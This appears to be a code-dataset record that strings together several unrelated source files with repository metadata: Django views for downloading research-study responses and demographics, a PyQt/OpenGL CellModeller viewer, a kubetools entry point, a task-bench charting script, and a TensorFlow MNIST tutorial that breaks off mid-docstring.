user = self.request.user
study = self.get_object()
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = study.responses
if preview_only:
responses = responses.filter(is_preview=True)
comments = json.loads(form_data.get("comments"))
for ruling in ("accepted", "rejected", "pending"):
judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
for response in judged_responses:
response.consent_rulings.create(
action=ruling,
arbiter=user,
comments=comments.pop(str(response.uuid), None),
)
response.save()
if comments:
for resp_uuid, comment in comments.items():
response = responses.get(uuid=resp_uuid)
response.consent_rulings.create(
action=response.most_recent_ruling, arbiter=user, comments=comment
)
return HttpResponseRedirect(
reverse(
"exp:study-responses-consent-manager",
kwargs=dict(pk=self.get_object().pk),
)
)
def get(self, request, *args, **kwargs):
if self.get_object().study_type.is_external:
messages.error(request, "There is no consent manager for external studies.")
return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
else:
return super().get(request, *args, **kwargs)
class StudyResponsesAll(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
template_name = "studies/study_responses_all.html"
queryset = Study.objects.all()
http_method_names = ["get"]
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_delete_preview_data"] = self.request.user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDeletePreviewResponses(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
SingleObjectMixin,
View,
):
queryset = Study.objects.all()
def user_can_delete_preview_data(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, study
)
test_func = user_can_delete_preview_data
def post(self, request, *args, **kwargs):
study = self.get_object()
preview_responses = study.responses.filter(is_preview=True).prefetch_related(
"videos", "responselog_set", "consent_rulings", "feedback"
)
paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
resp.delete()
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs={"pk": study.id})
)
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
# responses in memory
paginate_by = 1
def make_chunk(self, paginator, page_num, header_options):
chunk = ""
if page_num == 1:
chunk = "[\n"
chunk += ",\n".join(
json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t", # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
default=str,
)
for resp in paginator.page(page_num)
)
if page_num == paginator.page_range[-1]:
chunk += "\n]"
else:
chunk += ",\n"
return chunk
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
filename = "{}_{}.json".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = StreamingHttpResponse(
(
self.make_chunk(paginator, page_num, header_options)
for page_num in paginator.page_range
),
content_type="text/json",
)
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
headers = set()
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
# Add any new headers from this session
headers = headers | row_data.keys()
session_list.append(row_data)
header_options = set(self.request.GET.getlist("data_options"))
header_list = get_response_headers(header_options, headers)
output, writer = csv_dict_output_and_writer(header_list)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
def build_summary_dict_csv(self, optional_headers_selected_ids):
descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
header_list = get_response_headers(
optional_headers_selected_ids, descriptions.keys()
)
all_descriptions = [
{"column": header, "description": descriptions[header]}
for header in header_list
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
header_options = self.request.GET.getlist("data_options")
cleaned_data = self.build_summary_dict_csv(header_options)
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-responses-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
child_list = []
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
}
)
if row_data["child__global_id"] not in child_list:
child_list.append(row_data["child__global_id"])
session_list.append(row_data)
output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-identifiable"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
def build_child_dict_csv(self):
all_descriptions = [
{"column": col.id, "description": col.description}
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
cleaned_data = self.build_child_dict_csv()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
# TODO: with large files / many responses generation can take a while. Should generate asynchronously along
# with the data dict.
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
if study.study_type.is_external:
messages.error(
self.request, "Frame data is not available for External Studies."
)
return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
zipped_file = io.BytesIO() # import io
with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
data = build_single_response_framedata_csv(resp)
filename = "{}_{}_{}.csv".format(
study_name_for_files(study.name), resp.uuid, "frames"
)
zipped.writestr(filename, data)
zipped_file.seek(0)
response = FileResponse(
zipped_file,
as_attachment=True,
filename="{}_framedata_per_session.zip".format(
study_name_for_files(study.name)
),
)
return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
def get(self, request, *args, **kwargs):
study = self.study
if study.study_type.is_external:
messages.error(
request, "Frame data dictionary is not available for external studies"
)
else:
filename = "{}_{}_{}".format(
study_name_for_files(study.name), study.uuid, "all-frames-dict"
)
build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
messages.success(
request,
f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs=self.kwargs)
)
class StudyDemographics(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
template_name = "studies/study_demographics.html"
queryset = Study.objects.all()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
study = self.study
header_options = self.request.GET.getlist("demo_options")
json_responses = []
paginator = context["paginator"]
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
json_responses.append(
json.dumps(
construct_response_dictionary(
resp,
DEMOGRAPHIC_COLUMNS,
header_options,
include_exp_data=False,
),
indent="\t",
default=str,
)
)
cleaned_data = f"[ {', '.join(json_responses)} ]"
filename = "{}_{}.json".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/json")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
study = self.study
paginator = context["paginator"]
header_options = set(self.request.GET.getlist("demo_options"))
participant_list = []
headers_for_download = get_demographic_headers(header_options)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
participant_list.append(row_data)
output, writer = csv_dict_output_and_writer(headers_for_download)
writer.writerows(participant_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
header_options = set(self.request.GET.getlist("demo_options"))
headers_for_download = get_demographic_headers(header_options)
all_descriptions = [
{"column": col.id, "description": col.description}
for col in DEMOGRAPHIC_COLUMNS
if col.id in headers_for_download
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
def get(self, request, *args, **kwargs):
study = self.study
responses = (
study.consented_responses.order_by("id")
.select_related("child", "child__user", "study")
.values(
"uuid",
"child__uuid",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
)
)
child_dict = {}
account_dict = {}
collision_text = ""
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
participant_hashed_id = hash_participant_id(resp)
participant_global_id = resp["child__user__uuid"]
child_hashed_id = hash_child_id(resp)
child_global_id = resp["child__uuid"]
if participant_hashed_id in account_dict:
if participant_global_id != account_dict[participant_hashed_id]:
collision_text += "Participant hashed ID {} ({}, {})\n".format(
participant_hashed_id,
account_dict[participant_hashed_id],
participant_global_id,
)
else:
account_dict[participant_hashed_id] = participant_global_id
if child_hashed_id in child_dict:
if child_global_id != child_dict[child_hashed_id]:
collision_text += "Child hashed ID {} ({}, {})<br>".format(
child_hashed_id,
child_dict[child_hashed_id],
child_global_id,
)
else:
child_dict[child_hashed_id] = child_global_id
return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
template_name = "studies/study_attachments.html"
model = Video
paginate_by = 100
def get_ordering(self):
return self.request.GET.get("sort", "-created_at") or "-created_at"
def get_queryset(self):
study = self.study
videos = study.videos_for_consented_responses
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, study
):
videos = videos.filter(response__is_preview=True)
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, study
):
videos = videos.filter(response__is_preview=False)
match = self.request.GET.get("match", "")
if match:
videos = videos.filter(full_name__icontains=match)
return videos.order_by(self.get_ordering())
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["match"] = self.request.GET.get("match", "")
context["study"] = self.study
return context
def post(self, request, *args, **kwargs):
match = self.request.GET.get("match", "")
study = self.study
if self.request.POST.get("all-attachments"):
build_zipfile_of_videos.delay(
f"{study.uuid}_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=False,
)
messages.success(
request,
f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
if self.request.POST.get("all-consent-videos"):
build_zipfile_of_videos.delay(
f"{study.uuid}_consent_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=True,
)
messages.success(
request,
f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-attachments", kwargs=self.kwargs)
)
| true | true |
f72edc7d2c194fe94d3f029b4088fafe7afdce75 | 3,944 | py | Python | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
selectedCell = pyqtSignal(str)#CellState, name='selectedCell')
selectedName = -1
dt = 0.25
def __init__(self, parent = None):
PyGLWidget.__init__(self,parent)
self.animTimer = QTimer()
self.animTimer.timeout.connect(self.animate)
self.renderInfo = None
self.sim= None
self.modfile = None
self.record = False
self.set_radius(32)
self.frameNo = 0
def help(self):
pass
def setSimulator(self, sim):
self.sim = sim
@pyqtSlot(bool)
def toggleRun(self, run):
if run:
self.animTimer.start(0)
else:
self.animTimer.stop()
@pyqtSlot(bool)
def toggleRecord(self, rec):
self.record = rec
self.sim.savePickle = rec
@pyqtSlot()
def reset(self):
self.sim = Simulator(self.modname, self.dt)
#if self.sim:
# self.sim.reset()
self.frameNo = 0
@pyqtSlot()
def load(self):
qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
self.modfile = str(qs)
self.loadFile(self.modfile)
def loadFile(self, modstr):
(path,name) = os.path.split(modstr)
modname = str(name).split('.')[0]
self.modname = modname
sys.path.append(path)
if self.sim:
self.sim.reset(modname)
else:
self.sim = Simulator(modname, self.dt)
#self.draw()
self.paintGL()
def animate(self):
if self.sim:
self.sim.step()
self.updateSelectedCell()
self.frameNo += 1
if self.record:
if (self.frameNo%5)==0:
self.setSnapshotCounter(self.frameNo)
self.saveSnapshot()
def updateSelectedCell(self):
if self.sim:
states = self.sim.cellStates
cid = self.selectedName
txt = ''
if states.has_key(cid):
s = states[cid]
for (name,val) in s.__dict__.items():
if name not in CellState.excludeAttr:
vals = str(val)
#if len(vals)>6: vals = vals[0:6]
txt = txt + name + ': ' + vals + '\n'
self.selectedCell.emit(txt)
if self.sim.stepNum%100==0:
self.updateGL()
def postSelection(self, name):
self.selectedName = name
self.updateSelectedCell()
def paintGL(self):
PyGLWidget.paintGL(self)
glClearColor(0.5,0.5,0.5,0.0)
glClear(GL_COLOR_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
#s = self.renderInfo.scale
#glScalef(s,s,s)
if self.sim:
for r in self.sim.renderers:
if r != None:
r.render_gl(self.selectedName)
glPopMatrix()
def drawWithNames(self):
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
#s = self.renderInfo.scale
#glScalef(s,s,s)
if self.sim:
for r in self.sim.renderers:
if r:
r.renderNames_gl()
glPopMatrix()
class RenderInfo:
def __init__(self):
self.renderers = []
self.scale = 1.0
def addRenderer(self, renderer):
self.renderers.append(renderer)
def reset(self):
self.renderers = []
self.scale = 1.0
def setScale(self, s):
self.scale = s
| 26.648649 | 86 | 0.556288 | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
selectedCell = pyqtSignal(str)
selectedName = -1
dt = 0.25
def __init__(self, parent = None):
PyGLWidget.__init__(self,parent)
self.animTimer = QTimer()
self.animTimer.timeout.connect(self.animate)
self.renderInfo = None
self.sim= None
self.modfile = None
self.record = False
self.set_radius(32)
self.frameNo = 0
def help(self):
pass
def setSimulator(self, sim):
self.sim = sim
@pyqtSlot(bool)
def toggleRun(self, run):
if run:
self.animTimer.start(0)
else:
self.animTimer.stop()
@pyqtSlot(bool)
def toggleRecord(self, rec):
self.record = rec
self.sim.savePickle = rec
@pyqtSlot()
def reset(self):
self.sim = Simulator(self.modname, self.dt)
self.frameNo = 0
@pyqtSlot()
def load(self):
qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
self.modfile = str(qs)
self.loadFile(self.modfile)
def loadFile(self, modstr):
(path,name) = os.path.split(modstr)
modname = str(name).split('.')[0]
self.modname = modname
sys.path.append(path)
if self.sim:
self.sim.reset(modname)
else:
self.sim = Simulator(modname, self.dt)
self.paintGL()
def animate(self):
if self.sim:
self.sim.step()
self.updateSelectedCell()
self.frameNo += 1
if self.record:
if (self.frameNo%5)==0:
self.setSnapshotCounter(self.frameNo)
self.saveSnapshot()
def updateSelectedCell(self):
if self.sim:
states = self.sim.cellStates
cid = self.selectedName
txt = ''
if states.has_key(cid):
s = states[cid]
for (name,val) in s.__dict__.items():
if name not in CellState.excludeAttr:
vals = str(val)
txt = txt + name + ': ' + vals + '\n'
self.selectedCell.emit(txt)
if self.sim.stepNum%100==0:
self.updateGL()
def postSelection(self, name):
self.selectedName = name
self.updateSelectedCell()
def paintGL(self):
PyGLWidget.paintGL(self)
glClearColor(0.5,0.5,0.5,0.0)
glClear(GL_COLOR_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
if self.sim:
for r in self.sim.renderers:
if r != None:
r.render_gl(self.selectedName)
glPopMatrix()
def drawWithNames(self):
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
if self.sim:
for r in self.sim.renderers:
if r:
r.renderNames_gl()
glPopMatrix()
class RenderInfo:
def __init__(self):
self.renderers = []
self.scale = 1.0
def addRenderer(self, renderer):
self.renderers.append(renderer)
def reset(self):
self.renderers = []
self.scale = 1.0
def setScale(self, s):
self.scale = s
| true | true |
f72edcdbbb2b57a739aa3dd65eb9b81da1a7a756 | 245 | py | Python | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 5 | 2020-04-20T21:24:14.000Z | 2022-01-29T15:35:02.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 69 | 2019-12-17T16:16:21.000Z | 2022-03-23T11:19:49.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 1 | 2022-01-14T04:12:15.000Z | 2022-01-14T04:12:15.000Z | #!/usr/bin/env python
from kubetools.dev import dev
from kubetools.main import run_cli
# Import click command groups
from kubetools.dev import ( # noqa: F401, I100, I202
container,
environment,
logs,
scripts,
)
run_cli(dev)
| 15.3125 | 53 | 0.706122 |
from kubetools.dev import dev
from kubetools.main import run_cli
from kubetools.dev import (
container,
environment,
logs,
scripts,
)
run_cli(dev)
| true | true |
f72edd75707f96cb22c318119a9cfc892b3341ff | 4,296 | py | Python | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 23 | 2018-08-31T03:51:08.000Z | 2021-10-21T08:01:44.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 30 | 2018-06-27T19:45:53.000Z | 2022-03-23T04:26:11.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 26 | 2018-05-29T22:56:59.000Z | 2022-01-27T18:54:26.000Z | #!/usr/bin/env python3
# Copyright 2020 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
self.ngraphs = ngraphs
self.dependence = dependence.replace('_', ' ')
self.system = system
self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
self.csv_dialect = csv_dialect
self.header = []
self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
self.metg = collections.defaultdict(lambda: float('inf'))
def filter(self, row):
return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
def process(self, row, data, metg=None):
if self.system is not None:
assert metg is not None
self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
for values in zip(*list(data.values())):
items = dict(zip(data.keys(), values))
iterations = row['nodes'] * items['iterations']
if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
name = iterations if self.system is not None else row['name']
if name not in self.header:
self.header.append(name)
self.table[row['nodes']][name] = min(
items['elapsed'],
self.table[row['nodes']][name],
key=float)
def error_value(self):
return {}
def complete(self):
# FIXME: This isn't actually the criteria we'd like to sort on,
# we'd prefer to sort so that the list of names roughly parallels
# the order of the bars in the graph.
self.header.sort()
if self.system is not None:
self.header.reverse()
self.header.insert(0, 'nodes')
if self.system is not None:
self.header.append('metg')
out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
out.writeheader()
for nodes in sorted(self.table.keys()):
row = self.table[nodes]
row = {k: None if v == float('inf') else v for k, v in row.items()}
row['nodes'] = nodes
if self.system is not None:
row['metg'] = self.metg[nodes]
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--ngraphs', type=int, required=True)
parser.add_argument('-d', '--dependence', required=True)
parser.add_argument('-s', '--system')
parser.add_argument('--max-problem-size')
parser.add_argument('--min-problem-size')
parser.add_argument('-m', '--machine', required=True)
parser.add_argument('-r', '--resource', default='flops')
parser.add_argument('-t', '--threshold', type=float, default=0.5)
parser.add_argument('--csv-dialect', default='excel-tab')
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
driver(**vars(args))
| 40.914286 | 162 | 0.649209 |
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
self.ngraphs = ngraphs
self.dependence = dependence.replace('_', ' ')
self.system = system
self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
self.csv_dialect = csv_dialect
self.header = []
self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
self.metg = collections.defaultdict(lambda: float('inf'))
def filter(self, row):
return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
def process(self, row, data, metg=None):
if self.system is not None:
assert metg is not None
self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
for values in zip(*list(data.values())):
items = dict(zip(data.keys(), values))
iterations = row['nodes'] * items['iterations']
if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
name = iterations if self.system is not None else row['name']
if name not in self.header:
self.header.append(name)
self.table[row['nodes']][name] = min(
items['elapsed'],
self.table[row['nodes']][name],
key=float)
def error_value(self):
return {}
def complete(self):
# the order of the bars in the graph.
self.header.sort()
if self.system is not None:
self.header.reverse()
self.header.insert(0, 'nodes')
if self.system is not None:
self.header.append('metg')
out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
out.writeheader()
for nodes in sorted(self.table.keys()):
row = self.table[nodes]
row = {k: None if v == float('inf') else v for k, v in row.items()}
row['nodes'] = nodes
if self.system is not None:
row['metg'] = self.metg[nodes]
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--ngraphs', type=int, required=True)
parser.add_argument('-d', '--dependence', required=True)
parser.add_argument('-s', '--system')
parser.add_argument('--max-problem-size')
parser.add_argument('--min-problem-size')
parser.add_argument('-m', '--machine', required=True)
parser.add_argument('-r', '--resource', default='flops')
parser.add_argument('-t', '--threshold', type=float, default=0.5)
parser.add_argument('--csv-dialect', default='excel-tab')
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
driver(**vars(args))
| true | true |
f72ede905c2f5340f78dfcbe8efc10e27b0246a4 | 2,910 | py | Python | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 12 | 2018-03-07T00:44:56.000Z | 2019-01-25T11:07:43.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 3 | 2018-03-02T03:38:41.000Z | 2018-03-20T00:45:06.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 7 | 2018-03-02T07:14:53.000Z | 2019-01-04T08:06:47.000Z | # Lab 10 MNIST and NN
import tensorflow as tf
import random
# import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777) # reproducibility
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Check out https://www.tensorflow.org/get_started/mnist/beginners for
# more information about the mnist dataset
# parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
# input place holders
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & bias for nn layers
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
# define cost/loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
# plt.imshow(mnist.test.images[r:r + 1].
# reshape(28, 28), cmap='Greys', interpolation='nearest')
# plt.show()
'''
Epoch: 0001 cost = 141.207671860
Epoch: 0002 cost = 38.788445864
